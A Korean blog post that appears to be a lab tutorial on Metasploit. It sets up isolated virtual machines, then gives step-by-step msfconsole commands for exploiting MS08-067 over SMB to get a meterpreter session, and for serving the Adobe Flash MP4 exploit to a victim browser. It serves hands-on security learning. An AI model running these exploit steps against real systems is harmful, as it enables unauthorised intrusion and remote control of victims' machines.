반응형

소프트웨어 버그 헌팅 - 1

메타스플로잇 실습(MS08_067,어도브 취약점)

 

메타스플로잇 실습을 위한 환경 구축

kali : root / toor

칼리 설정 : 네트워크 -> 호스트 only, USB -> 1.1으로 변경
IP : 192.168.56.101

vm  설정 : 네트워크 -> 호스트 only(Host2에 설정)
              저장소 -> 컨트롤러 IDE 새로추가(비움) -> 실행 후 ->게스트확장자 CD 삽입
              메모리 조금 더 추가
              방화벽 해제
IP : 192.168.56.103

win7 설정 : 네트워크 -> 호스트 only
              저장소 -> 컨트롤러 IDE 새로추가(비움) -> 실행 후 ->게스트확장자 CD 삽입
              방화벽 해제
IP : 192.168.56.102

 

 


칼리에서 CD/USR/share/metasploit-framework/modules/exploits 경로에는 각종 익스플로잇이 존재한다.

WIN xp로 실습할 예정이므로 Windows 경로에 들어가면 Windows 관련 익스플로잇이 존재한다.

def initialzize는 기본적인 정보를 알려준다. 실질적인 취약점 코드는 def exploit 이다.

ms08_067를 메타스플로잇으로 시연해볼 예정이다.

해당 취약점은 SMB 취약점으로써 SMB를 사용하고 있어야한다.

그러므로 VM환경에서 SMB를 활성화 해야한다.

 

>> msfconsole : 메타스플로잇 콘솔 실행

메타스플로잇 콘솔 실행한 후

>> search ms08-067
해당 명령어로 익스플로잇이 존재하는지 확인할 수 있으며 경로를 use 경로로 사용할 수 있다

 

>> use exploit/windows/smb/ms08_067_netapi  2008-10-28

>> info
해당 익스플로잇의 전반적인 정보를 알 수 있음

>>show options
해당 익스플로잇의 옵션 값에 대한 정보를 알 수 있음

>>set rhosts 192.168.56.103(vm)
rhosts 값을 192.168.56.103(VM ip)로 변경

>>exploit
설정된 값으로 공격 시행(run해도됨)

meterpreter 뜨면 제대로 성공한 것이다


Adobe 플래쉬을 메타스플로잇으로 공격해보자

 

'VM' 환경에 install flash player와 와이어 샤크를 설치한다.

install_flash_player_ax_10.3.183.10.exe

 

>>use exploit/windows/browser/adobe_flash_mp4_cprt

>>set srvhost 칼리 IP

>>set urlpath /

>> lhost 칼리 IP

>> run

Server Started가 뜬다.

VM으로 가서 와이어샤크를 실행해준다.

 

이제 VM에 가서 익스플로러를 실행하고 URL에  http://칼리IP:포트/URL 입력한다.

성공하면 와이어샤크에서 file -> Export Objects -> Http 에서 파일이 3개 있는 것을 알 수 있다.

그리고 익스플로러는 자동 종료될 것이다.

 

 

반응형
  • 네이버 블러그 공유하기
  • 네이버 밴드에 공유하기
  • 페이스북 공유하기
  • 카카오스토리 공유하기